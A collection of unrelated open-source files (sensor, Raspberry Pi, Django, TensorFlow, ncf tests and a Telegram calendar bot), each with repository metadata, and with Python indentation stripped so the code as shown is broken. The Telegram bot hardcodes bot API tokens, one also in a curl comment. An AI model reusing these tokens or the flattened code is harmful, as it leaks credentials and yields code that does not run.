f.write('\\documentclass{article}\n')
f.write('\\usepackage{tipa}\n')
f.write('\\usepackage{gettext}\n')
f.write(generate_command('\\testfn', i[0]))
f.write('\n')
f.write('\\begin{document}\n')
f.write('\\testfn{')
f.write(str(n))
f.write('}\n')
f.write('\\end{document}')
kwargs = dict(stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
subprocess.check_call(['latex', TEST_FILE_PREFIX+'.tex'], **kwargs)
subprocess.check_call(['dvisvgm', TEST_FILE_PREFIX+'.dvi'], **kwargs)
with open(TEST_FILE_PREFIX+'.svg') as f:
f = f.read()
f = f.replace('\n', '')
f = re_text.findall(f)
f = [ re_tspan.sub(' ', i[1]) for i in f ]
f = ''.join(f)
f = f.strip()
if f.endswith('1'): #strip page number
f = f[:-1]
f = f.strip()
f = int(f)
expected = i[1](n)
actual = f
self.assertEqual(expected, actual)
if __name__ == '__main__':
unittest.main()
|
mplucinski/tex-gettext
|
tex_math.py
|
Python
|
bsd-2-clause
| 15,267
|
# -*- coding: utf-8 -*-
# Distributed under the terms of the GNU General Public License v2
|
apinsard/appi
|
.skel.py
|
Python
|
gpl-2.0
| 91
|
#coding=gbk
#####################################################################################################
# Program test environment
# Python version: 3.4.1
# Firmware version:2.8.28
# Dependent files(MacOSX):libGinkgo_Driver.dylib,libusb-0.1.4.dylib,libusb-1.0.0.dylib,ControlI2C.py
# Dependent files(Windows):Ginkgo_Driver.dll,ControlI2C.py
# Dependent files(Linux):libGinkgo_Driver.so,libusb-1.0.so,ControlI2C.py
#####################################################################################################
from ctypes import *
from time import sleep
# import USB-I2C module
import ControlI2C
def get_data():
# Scan device
nRet = ControlI2C.VII_ScanDevice(1)
if(nRet <= 0):
print("No device connect!")
exit()
else:
print("Connected device number is:"+repr(nRet))
# Open device
nRet = ControlI2C.VII_OpenDevice(ControlI2C.VII_USBI2C,0,0)
if(nRet != ControlI2C.ERR_SUCCESS):
print("Open device error!")
exit()
else:
print("Open device success!")
# Initialize device
I2C_InitConfig = ControlI2C.VII_INIT_CONFIG()
# Master mode
I2C_InitConfig.MasterMode = ControlI2C.VII_MASTER
# Hardware control
I2C_InitConfig.ControlMode = ControlI2C.VII_HCTL_MODE
# 7-bit address mode
I2C_InitConfig.AddrType = ControlI2C.VII_ADDR_7BIT
# No sub address
I2C_InitConfig.SubAddrWidth = ControlI2C.VII_SUB_ADDR_NONE
# Clock speed (in Hz)
I2C_InitConfig.ClockSpeed = 100000
nRet = ControlI2C.VII_InitI2C(ControlI2C.VII_USBI2C,0,0,byref(I2C_InitConfig))
if(nRet != ControlI2C.ERR_SUCCESS):
print("Initialize device error!")
exit()
else:
print("Initialize device success!")
# Wake up AM2311 sensor
WriteData = (c_byte * 8)()
ControlI2C.VII_WriteBytes(ControlI2C.VII_USBI2C, 0, 0, 0xB8, 0x00, byref(WriteData), 1)
# Send out the read-temperature-and-humidity command
WriteData[0] = 0x03
WriteData[1] = 0x00
WriteData[2] = 0x04
nRet = ControlI2C.VII_WriteBytes(ControlI2C.VII_USBI2C, 0, 0, 0xB8, 0x00, byref(WriteData), 3)
if (nRet != ControlI2C.ERR_SUCCESS):
print("Write data error! %d" % nRet)
exit()
# Read out temperature and humidity
ReadData = (c_ubyte * 8)()
nRet = ControlI2C.VII_ReadBytes(ControlI2C.VII_USBI2C, 0, 0, 0xB8, 0x00, byref(ReadData), 8)
if (nRet != ControlI2C.ERR_SUCCESS):
print("Read data error! %d" % nRet)
exit()
else:
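# AM2321-family read reply layout:
# [func, byte count, hum_hi, hum_lo, temp_hi, temp_lo, crc_lo, crc_hi];
# raw values are tenths of a degree / tenths of a percent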
t = ((ReadData[4] << 8) | ReadData[5]) / 10.0
h = ((ReadData[2] << 8) | ReadData[3]) / 10.0
print("temperature: %.1f ¡æ" % t)
print("humanity: %.1f £¥" % h)
result = {'t': t, 'h': h}
return result
# Loop measurement
# while(1):
# # Wake up AM2311 sensor
# WriteData = (c_byte * 8)()
# ControlI2C.VII_WriteBytes(ControlI2C.VII_USBI2C,0,0,0xB8,0x00,byref(WriteData),1)
# # Send out the read-temperature-and-humidity command
# WriteData[0] = 0X03;
# WriteData[1] = 0X00;
# WriteData[2] = 0X04;
# nRet = ControlI2C.VII_WriteBytes(ControlI2C.VII_USBI2C,0,0,0xB8,0x00,byref(WriteData),3)
# if(nRet != ControlI2C.ERR_SUCCESS):
# print("Write data error! %d"%nRet)
# exit()
# # Read out temperature and humidity
# ReadData = (c_ubyte * 8)()
# nRet = ControlI2C.VII_ReadBytes(ControlI2C.VII_USBI2C,0,0,0xB8,0x00,byref(ReadData),8)
# if(nRet != ControlI2C.ERR_SUCCESS):
# print("Read data error! %d"%nRet)
# exit()
# else:
# t = ((ReadData[4] << 8) | ReadData[5]) / 10.0
# h = ((ReadData[2] << 8) | ReadData[3]) / 10.0
# print("temperature: %.1f ¡æ"%t)
# print("humanity: %.1f £¥"%h)
# sleep(1)
|
ilab-tongji/raas
|
sensor/humiture/Python_USB_I2C_AM2321B.py
|
Python
|
mit
| 3,951
|
"""
Blink LEDs using Raspberry PI GPIO
"""
import RPi.GPIO as GPIO
import time
def blink(pin, num=5, speed=1):
"""Blink LED using given GPIO pin, number of times and speed.
Args:
- pin (int): GPIO pin to send signal
- num (int): num of times to blink (default: 5)
- speed (int): speed of each blink in seconds (default: 1)
Returns:
- None (blinks led)
"""
GPIO.setmode(GPIO.BCM) # Set GPIO pin numbering
GPIO.setup(pin, GPIO.OUT) # Set requested pin for output (once, not per blink)
for i in range(num):
GPIO.output(pin, GPIO.HIGH) # Turn on requested GPIO pin
time.sleep(speed) # Wait
GPIO.output(pin, GPIO.LOW) # Turn off requested GPIO pin
time.sleep(speed) # Wait
GPIO.cleanup() # Clean pin setup
if __name__ == '__main__':
pin = input("Enter pin number: ")
num = input("Enter the total number of times to blink: ")
speed = input("Enter the length of each blink in seconds: ")
blink(int(pin), int(num), float(speed))
|
kbsezginel/raspberry-pi
|
scripts/rpi/led/blink.py
|
Python
|
bsd-3-clause
| 1,077
|
#!/usr/bin/env python
# -*- test-case-name: agdevicecontrol.test.test_resource -*-
#
# AGDeviceControl
# Copyright (C) 2005 The Australian National University
#
# This file is part of AGDeviceControl.
#
# AGDeviceControl is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# AGDeviceControl is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with AGDeviceControl; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
from glob import glob as pyglob
import imp
import os, os.path
def module_path(p, path=None):
"""Recursive search to find a module's absolute path"""
# package hierarchy is dot separated, e.g., agdevicecontrol.clients
components = p.split('.')
modname = components[0]
file, path, description = imp.find_module(modname,path)
if file is not None:
try:
modobj = imp.load_module(modname, file, path, description)
#print "DEBUG: ", modobj.__file__
path = modobj.__file__
finally:
file.close()
if len(components) == 1:
return path
else:
return module_path('.'.join(components[1:]), path=[path])
def globdict(package, subdir=(), filter='*'):
# find absolute file path of package
path = module_path(package)
# add subdirs (subdir is a sequence of path components)
path = os.path.join(path, *subdir)
if os.path.isdir(path):
result = {}
for f in pyglob(path + os.sep + filter):
result[os.path.split(f)[1]] = f
return result
else:
raise ImportError
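# Minimal usage sketch (hypothetical layout; assumes the 'agdevicecontrol'
# package is importable):
#   files = globdict('agdevicecontrol', subdir=('clients',), filter='*.py')
#   # -> {'foo.py': '/abs/path/agdevicecontrol/clients/foo.py', ...}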
|
pwarren/AGDeviceControl
|
agdevicecontrol/common/resource.py
|
Python
|
gpl-2.0
| 2,011
|
from copy import deepcopy
from datetime import timedelta
import pytest
from django.utils import dateparse, timezone
from events.models import Event
from events.tests.test_event_get import get_detail, get_list
from events.tests.utils import assert_fields_exist, post_event, put_event
from extension_course.models import Course
COURSE_DATA = {
'enrolment_start_time': "2118-06-11T07:11:05.184117Z",
'enrolment_end_time': "2118-06-12T07:11:05.184117Z",
'maximum_attendee_capacity': 200,
'minimum_attendee_capacity': 20,
'remaining_attendee_capacity': 100,
}
COURSE_FIELDS = set(COURSE_DATA.keys())
@pytest.fixture
def minimal_event_with_course_dict(minimal_event_dict):
data = deepcopy(minimal_event_dict)
data['extension_course'] = COURSE_DATA
return data
@pytest.fixture
def event_with_course(event):
Course.objects.get_or_create(event=event, defaults={
'enrolment_start_time': timezone.now() - timedelta(days=1),
'enrolment_end_time': timezone.now() + timedelta(days=1),
'maximum_attendee_capacity': 100,
'minimum_attendee_capacity': 10,
'remaining_attendee_capacity': 50,
})
return event
def check_extension_data(data, course):
assert_fields_exist(data, COURSE_FIELDS)
assert dateparse.parse_datetime(data['enrolment_start_time']) == course.enrolment_start_time
assert dateparse.parse_datetime(data['enrolment_end_time']) == course.enrolment_end_time
assert data['maximum_attendee_capacity'] == course.maximum_attendee_capacity
assert data['minimum_attendee_capacity'] == course.minimum_attendee_capacity
assert data['remaining_attendee_capacity'] == course.remaining_attendee_capacity
@pytest.mark.django_db
def test_get_course_list(user_api_client, event_with_course):
response = get_list(user_api_client)
extension_data = response.data['data'][0]['extension_course']
check_extension_data(extension_data, event_with_course.extension_course)
@pytest.mark.django_db
def test_get_course_detail(user_api_client, event_with_course):
response = get_detail(user_api_client, event_with_course.pk)
extension_data = response.data['extension_course']
check_extension_data(extension_data, event_with_course.extension_course)
@pytest.mark.django_db
def test_post_course(minimal_event_with_course_dict, user_api_client):
response = post_event(user_api_client, minimal_event_with_course_dict)
assert Course.objects.count() == 1
event = Event.objects.latest('id')
course = Course.objects.get(event=event)
check_extension_data(response.data['extension_course'], course)
check_extension_data(COURSE_DATA, course)
@pytest.mark.django_db
def test_put_course(event_with_course, minimal_event_with_course_dict, user_api_client):
response = put_event(user_api_client, event_with_course, minimal_event_with_course_dict)
assert Course.objects.count() == 1
course = event_with_course.extension_course
course.refresh_from_db()
check_extension_data(response.data['extension_course'], course)
check_extension_data(COURSE_DATA, course)
|
City-of-Helsinki/linkedevents
|
extension_course/tests/test_api.py
|
Python
|
mit
| 3,110
|
import tensorflow as tf
import copy
def create_list_object(Object, count):
"""
create a list of copies of an object, using deep copy in
case the copies are used in different threads
Args:
Object: object to be copied
count: the number of copies
Return:
a list of objects
"""
res_list = []
for _ in xrange(count):
# actually copy, rather than appending the same object reference
res_list.append(copy.deepcopy(Object))
return res_list
class DataClass():
""" DataClass:
used for decode line
"""
def __init__(self, data_format):
self.data_format = data_format
self.decode_class = None
class BINClass():
"""
used for load binary file
"""
def __init__(self, shape, dtype = tf.float32):
""" shape: a list """
self.decode_fun = tf.decode_raw
self.dtype = dtype
self.shape = shape
def decode(self, filename, distort_data = False, whiten_data = False):
""" distort_data and whiten_data are not used """
bin_file = tf.read_file(filename)
bin_tensor = tf.decode_raw(bin_file, self.dtype)
bin_tensor = tf.to_float(bin_tensor)
bin_tensor = tf.reshape(bin_tensor, self.shape)
return bin_tensor
class ImageClass():
def __init__(self, shape, channels, offset, ratio = None, name = None):
"""offset: the difference between cropped image and orginal image
final shape will be shape
"""
self.channels = channels
self.ratio = ratio
self.name = name
self.shape = shape
self.offset = offset
self.decode_fun = None
def decode(self, filename, distort_data, whiten_data = True):
"""distort: random distort the iamge"""
image_tensor = tf.read_file(filename)
image_tensor = self.decode_fun(image_tensor, channels = self.channels, ratio = self.ratio)
image_tensor = tf.image.convert_image_dtype(image_tensor, tf.float32)
image_tensor = tf.image.resize_images(image_tensor,
[self.shape[0] + self.offset, self.shape[1] + self.offset])
if distort_data:
# it will crop in the function
image_tensor = self.distort_op(image_tensor)
else:
image_tensor = tf.image.resize_image_with_crop_or_pad(image_tensor,
self.shape[0], self.shape[1])
if whiten_data:
# Subtract off the mean and divide by the variance of the pixels.
image_tensor = tf.image.per_image_whitening(image_tensor)
return image_tensor
def distort_op(self, image_tensor):
""" copied from tensorflow cifar10 tutorial"""
# Randomly crop a [height, width] section of the image.
distorted_image = tf.random_crop(image_tensor, [self.shape[0],self.shape[1], self.channels])
# Randomly flip the image horizontally.
distorted_image = tf.image.random_flip_left_right(distorted_image)
# Because these operations are not commutative, consider randomizing
# the order of their operation.
# distorted_image = tf.image.random_brightness(distorted_image,
# max_delta=63)
# distorted_image = tf.image.random_contrast(distorted_image,
# lower=0.2, upper=1.8)
return distorted_image
class JPGClass(ImageClass):
"""
used to load jpg image files
"""
def __init__(self, shape, channels = None, off_set = None, ratio = None, name = None):
ImageClass.__init__(self, shape, channels, off_set, ratio, name)
self.decode_fun = tf.image.decode_jpeg
class PNGClass(ImageClass):
"""
used for load png image file
"""
def __init__(self, shape, channels = None, off_set = None, ratio = None, name = None):
ImageClass.__init__(self, shape, channels, off_set, ratio, name)
self.decode_fun = tf.image.decode_png
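# Minimal usage sketch (TF 0.x-era API, matching the calls above;
# 'photo.jpg' is a hypothetical file):
#   loader = JPGClass(shape=[224, 224], channels=3, off_set=16)
#   image_op = loader.decode(tf.constant('photo.jpg'), distort_data=True)
#   # image_op is a [224, 224, 3] float32 tensor, whitened by default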
|
polltooh/traffic_video_analysis
|
TensorflowToolbox/data_class.py
|
Python
|
apache-2.0
| 4,030
|
"""
Django settings for filfinds project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from django.core.urlresolvers import reverse_lazy
from os.path import dirname, join, exists
# Build paths inside the project like this: join(BASE_DIR, "directory")
BASE_DIR = dirname(dirname(dirname(__file__)))
STATICFILES_DIRS = [join(BASE_DIR, 'static')]
MEDIA_ROOT = join(BASE_DIR, 'media')
MEDIA_URL = "/media/"
# Use Django templates using the new Django 1.8 TEMPLATES settings
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
join(BASE_DIR, 'templates'),
# insert more TEMPLATE_DIRS here
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
# Insert your TEMPLATE_CONTEXT_PROCESSORS here or use this
# list if you haven't customized them:
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.debug',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# Use 12factor inspired environment variables or from a file
import environ
env = environ.Env()
# Ideally the env file should live outside the git repo,
# i.e. BASE_DIR.parent.parent
env_file = join(dirname(__file__), 'local.env')
if exists(env_file):
environ.Env.read_env(str(env_file))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/dev/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# Raises ImproperlyConfigured exception if SECRET_KEY not in os.environ
SECRET_KEY = env('SECRET_KEY')
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.auth',
'django_admin_bootstrapped',
'django.contrib.admin',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'authtools',
'crispy_forms',
'easy_thumbnails',
'profiles',
'accounts',
'content',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'filfinds.urls'
WSGI_APPLICATION = 'filfinds.wsgi.application'
# Database
# https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in
# os.environ
'default': env.db(),
}
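# env.db() parses the DATABASE_URL environment variable, e.g. (hypothetical
# credentials): DATABASE_URL=postgres://user:pass@localhost:5432/filfinds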
# Internationalization
# https://docs.djangoproject.com/en/dev/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/dev/howto/static-files/
STATIC_URL = '/static/'
# Crispy Form Theme - Bootstrap 3
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# For Bootstrap 3, change error alert to 'danger'
from django.contrib import messages
MESSAGE_TAGS = {
messages.ERROR: 'danger'
}
# Authentication Settings
AUTH_USER_MODEL = 'authtools.User'
LOGIN_REDIRECT_URL = reverse_lazy("profiles:show_self")
LOGIN_URL = reverse_lazy("accounts:login")
THUMBNAIL_EXTENSION = 'png' # Or any extension for your thumbnails
|
arminafrancisco/project1
|
src/filfinds/settings/base.py
|
Python
|
mit
| 3,983
|
#!/usr/bin/env python
import unittest
import ncf
import os.path
import subprocess
class TestNcf(unittest.TestCase):
def setUp(self):
self.test_technique_file = os.path.realpath('test_technique.cf')
self.test_generic_method_file = 'test_generic_method.cf'
self.technique_content = open(self.test_technique_file).read()
self.generic_method_content = open(self.test_generic_method_file).read()
def test_get_ncf_root_dir(self):
self.assertEqual(ncf.get_root_dir(), os.path.realpath(os.path.dirname(os.path.realpath(__file__)) + "/../../"))
#####################################
# Generic tests for parsing .cf files
#####################################
def test_parse_bundlefile_empty(self):
"""Attempting to parse an empty string should raise an exception"""
self.assertRaises(Exception, ncf.parse_bundlefile_metadata, "")
def test_parse_bundlefile_incomplete(self):
"""Attempting to parse a bundle file with metadata after the bundle agent declaration should raise an exception"""
self.assertRaises(Exception, ncf.parse_bundlefile_metadata, """# @name A name
bundle agent thingy {
}
# @description bla bla
# @version 1.0""")
#########################
# Technique parsing tests
#########################
def test_parse_technique(self):
"""Parsing should return a dict with all defined technique tags"""
metadata = ncf.parse_technique_metadata(self.technique_content)
self.assertEqual(sorted(metadata.keys()), sorted(ncf.tags["technique"]+ncf.tags["common"]))
def test_parse_technique_data(self):
"""Parsing should return a dict with the data from the test technique"""
metadata = ncf.parse_technique_metadata(self.technique_content)
self.assertEqual(metadata['name'], "Bla Technique for evaluation of parsingness")
self.assertEqual(metadata['description'], "This meta-Technique is a sample only, allowing for testing.")
self.assertEqual(metadata['version'], "0.1")
self.assertEqual(metadata['bundle_name'], "bla")
self.assertEqual(metadata['bundle_args'], [])
##############################
# Generic method parsing tests
##############################
def test_parse_generic_method(self):
"""Parsing a generic method should return a dict with all defined generic_method tags"""
metadata = ncf.parse_generic_method_metadata(self.generic_method_content)
self.assertEqual(sorted(metadata.keys()), sorted(ncf.tags["generic_method"]+ncf.tags["common"]))
def test_parse_generic_method_data(self):
"""Parsing should return a dict with the data from the test generic_method"""
metadata = ncf.parse_generic_method_metadata(self.generic_method_content)
self.assertEqual(metadata['bundle_name'], "package_install_version")
self.assertEqual(metadata['bundle_args'], ["package_name", "package_version"])
self.assertEqual(metadata['name'], "Package install")
self.assertEqual(metadata['class_prefix'], "package_install")
self.assertEqual(metadata['class_parameter'], "package_name")
self.assertEqual(metadata['class_parameter_id'], 1)
self.assertEqual(len(metadata), len(ncf.tags["generic_method"]+ncf.tags["common"]))
###########################################################
# Tests to obtain the generic methods that a Technique uses
###########################################################
def test_parse_technique_generic_method_calls_nonexistant_file(self):
"""Attempting to parse a non existant file should return an exception"""
self.assertRaises(Exception, ncf.parse_technique_methods, "/dev/nonexistant")
def test_parse_technique_generic_method_calls(self):
"""Parsing a technique should return a list of it's generic method calls"""
bundle_calls = ncf.parse_technique_methods(self.test_technique_file)
expected = [ { 'method_name': 'package_install_version', 'args': ['${bla.apache_package_name}', '2.2.11'], 'class_context': 'any' },
{ 'method_name': 'service_start', 'args': ['${bla.apache_package_name}'], 'class_context': 'cfengine' },
{ 'method_name': 'package_install', 'args': ['openssh-server'], 'class_context': 'cfengine' },
]
self.assertEqual(bundle_calls, expected)
def test_parse_technique_generic_method_calls_strings(self):
"""Parsing a technique should return a list of it's generic method calls even if they are string literals"""
bundle_calls = ncf.parse_technique_methods(self.test_technique_file)
expected = [ { 'method_name': 'package_install_version', 'args': ['${bla.apache_package_name}', '2.2.11'], 'class_context': 'any' },
{ 'method_name': 'service_start', 'args': ['${bla.apache_package_name}'], 'class_context': 'cfengine' },
{ 'method_name': 'package_install', 'args': ['openssh-server'], 'class_context': 'cfengine' },
]
self.assertEqual(bundle_calls, expected)
#####################################
# Tests for reading all metadata info
#####################################
def test_get_all_generic_methods_metadata(self):
"""get_all_generic_methods_metadata should return a list of all generic_methods with all defined metadata tags"""
metadata = ncf.get_all_generic_methods_metadata()
number_generic_methods = len(ncf.get_all_generic_methods_filenames())
self.assertEqual(number_generic_methods, len(metadata))
def test_get_all_techniques_metadata(self):
"""get_all_techniques_metadata should return a list of all techniques with all defined metadata tags and methods_called"""
metadata = ncf.get_all_techniques_metadata()
number = len(ncf.get_all_techniques_filenames())
self.assertEqual(number, len(metadata))
if __name__ == '__main__':
unittest.main()
|
ncharles/ncf
|
tests/unit/test_ncf.py
|
Python
|
gpl-3.0
| 5,927
|
import urllib
import urllib2
import pprint
import json
import datetime
import time
import logging
from calendar_bot import CalendarClient
'''Returns 'TANAAN!!' if today is a paapaiva, and a date string otherwise.
Returns None if there is no paapaiva in the next 10 days.
'''
def is_paapaiva(client):
# the events from the raati15 calendar for the next 10 days
events = client.get_calendar_events(10)
#print(events)
#events is like [('2016-09-11T12:30:00+03:00', u'test event')]
if events:
# replacing Finnish characters (ä -> a)
ascii_events = [(x[0],x[1].encode('ascii', 'xmlcharrefreplace').replace('ä', 'a') ) for x in events]
#filtering only paapaivat
only_paapaivas = [x for x in ascii_events if 'paa' in x[1].lower() and 'paiva' in x[1].lower() ]
#print(only_paapaivas)
for paiva in only_paapaivas:
#date parsing
stripped_date = paiva[0][0:10]
calendar_date = datetime.datetime.strptime(stripped_date, '%Y-%m-%d')
#if today is paapaiva
now = datetime.datetime.utcnow()
today = now - datetime.timedelta(minutes=now.minute, hours=now.hour, seconds=now.second, microseconds=now.microsecond)
#print(calendar_date)
#print(today)
if calendar_date == today:
return "TANAAN!!"
else:
return "{}".format(stripped_date)
return None
else:
return None
from telegram.error import (TelegramError, Unauthorized, BadRequest, TimedOut, ChatMigrated, NetworkError)
from telegram.ext import CommandHandler
from telegram.ext import Updater
tanaan_photo_address = 'AgADBAADBeY1G5sdZAeZOQAB_xifyPymVaAZAARU0-rzUc8xq5I8AAIC' # 'http://i.imgur.com/2k3j2NA.jpg'
fugee_rooriin_address ='AgADBAADKeI1G1caZAeDNH-tzcHDX8VYoBkABKVGDyIMeSxuQz0AAgI' #'http://i.imgur.com/ykFysmr.jpg'
ei_tanaan_address = 'AgADBAADLNM1GxUdZAfdLhEdfQINz65boBkABN7nsRV8UWIQwSAAAgI' #'http://i.imgur.com/nxkzkpW.jpg'
calendar_id = '2a668f5qv3pmvn251mviqlc6vk@group.calendar.google.com' #id for raati 15 calendar
calendar_client = CalendarClient(calendar_id)
logging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',level=logging.INFO)
botid = '268119392:AAErkOPlFBVJIG7Yc_L2m-IzRA0f67tz7qg'
test_botid = '301043923:AAE0VP2x_wWV70s-Yvz3N4_InhG0ShIGhyA'
updater = Updater(token=botid)
dispatcher = updater.dispatcher
#starting
def start(bot, update):
bot.sendMessage(chat_id=update.message.chat_id, text="I'm a bot, please talk to me!")
def stop(bot, update):
updater.stop()
updater.idle()
#paapaiva
def paapaiva(bot, update):
paapaiva = is_paapaiva(calendar_client)
if paapaiva:
bot.sendMessage(chat_id=update.message.chat_id, text=("Seuraava PAAPAIVA on:\n" + paapaiva) )
if paapaiva == "TANAAN!!":
bot.sendPhoto(chat_id=update.message.chat_id, photo=tanaan_photo_address)
else:
bot.send_message(chat_id=update.message.chat_id, text=("Seuraava PAAPAIVA on:\n" + "Ei PAAPAIVAA seuraavaan 10 paivaan :(") )
#fugee
def fugee(bot, update):
msg = bot.sendPhoto(chat_id=update.message.chat_id, photo=fugee_rooriin_address)
#ei
def ei(bot, update):
msg = bot.sendPhoto(chat_id=update.message.chat_id, photo=ei_tanaan_address)
#pprint.pprint("sent photo id: " + msg.photo[0].file_id)
#error handling
def error_callback(bot, update, error):
try:
raise error
except Unauthorized:
print("Unauthorized") # remove update.message.chat_id from conversation list
except BadRequest:
print("BadRequest") # handle malformed requests - read more below!
except TimedOut:
print("TimedOut") # handle slow connection problems
except NetworkError:
print("NetworkError") # handle other connection problems
except ChatMigrated as e:
print("ChatMigrated") # the chat_id of a group has changed, use e.new_chat_id instead
except TelegramError:
print("TelegramError") # handle all other telegram related errors
start_handler = CommandHandler('start', start)
stop_handler = CommandHandler('stop', stop)
paapaiva_handler = CommandHandler('paapaiva', paapaiva)
fugee_handler = CommandHandler('fugee', fugee)
ei_handler = CommandHandler('ei', ei)
dispatcher.add_handler(start_handler) #handler '/start'
dispatcher.add_handler(stop_handler)
dispatcher.add_handler(paapaiva_handler) #handle '/paapaiva'
dispatcher.add_handler(fugee_handler)
dispatcher.add_handler(ei_handler)
dispatcher.add_error_handler(error_callback) #error handler
updater.start_polling(poll_interval = 2.0, clean = True)
#curl -s -X POST "https://api.telegram.org/bot268119392:AAErkOPlFBVJIG7Yc_L2m-IzRA0f67tz7qg/sendPhoto" -F chat_id=89456514 -F photo="http://i.imgur.com/2k3j2NA.jpg"
|
miikama/telegram-bot
|
bot2.py
|
Python
|
mit
| 4,609
|
#
# Handle the special case of the first scenario
#
self.notebook.switchScenario(0,scenarioType="Powder")
#
#
#
tab = self.notebook.mainTab
tab.settings['Program'] = 'castep'
tab.settings['Output file name'] = 'phonon.castep'
tab.settings['Excel file name'] = 'analysis_bruggeman.xlsx'
tab.settings['Script file name'] = 'analysis_bruggeman.py'
tab.settings['QM program'] = ''
#
#
tab = self.notebook.settingsTab
tab.settings['Eckart flag'] = True
tab.settings['Neutral Born charges'] = False
tab.settings['Sigma value'] = 10.0
tab.settings['Mass definition'] = 'average'
tab.settings['Optical permittivity edited'] = False
tab.sigmas_cm1 = [10.0, 10.0, 10.0, 10.0, 10.0, 10.0]
#
#
tab = self.notebook.scenarios[0]
tab.settings['Legend'] = 'f=0.01'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.01579304466235449
tab.settings['Volume fraction'] = 0.009999999999999998
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[1]
tab.settings['Legend'] = 'f=0.1'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.1500292973489613
tab.settings['Volume fraction'] = 0.09999999999999999
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[2]
tab.settings['Legend'] = 'f=0.2'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.2842572707828141
tab.settings['Volume fraction'] = 0.19999999999999996
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
tab.settings['Ellipsoid a/b'] = 1.0
tab.settings['Unique direction - h'] = 0
tab.settings['Unique direction - k'] = 0
tab.settings['Unique direction - l'] = 1
tab.settings['Mass or volume fraction'] = 'volume'
tab.settings['ATR material refractive index'] = 4.0
tab.settings['ATR theta'] = 45.0
tab.settings['ATR S polarisation fraction'] = 0.5
tab.settings['Effective medium method'] = 'Bruggeman'
tab.settings['Particle shape'] = 'Sphere'
#
#
self.notebook.addScenario(scenarioType="Powder")
tab = self.notebook.scenarios[3]
tab.settings['Legend'] = 'f=0.3'
tab.settings['Scenario type'] = 'Powder'
tab.settings['Matrix'] = 'ptfe'
tab.settings['Matrix density'] = 2.2
tab.settings['Matrix permittivity'] = 2.0
tab.settings['Bubble radius'] = 30.0
tab.settings['Bubble volume fraction'] = 0.0
tab.settings['Mass fraction'] = 0.405055368745222
tab.settings['Volume fraction'] = 0.30000000000000004
tab.settings['Particle size(mu)'] = 0.0001
tab.settings['Particle size distribution sigma(mu)'] = 0.0
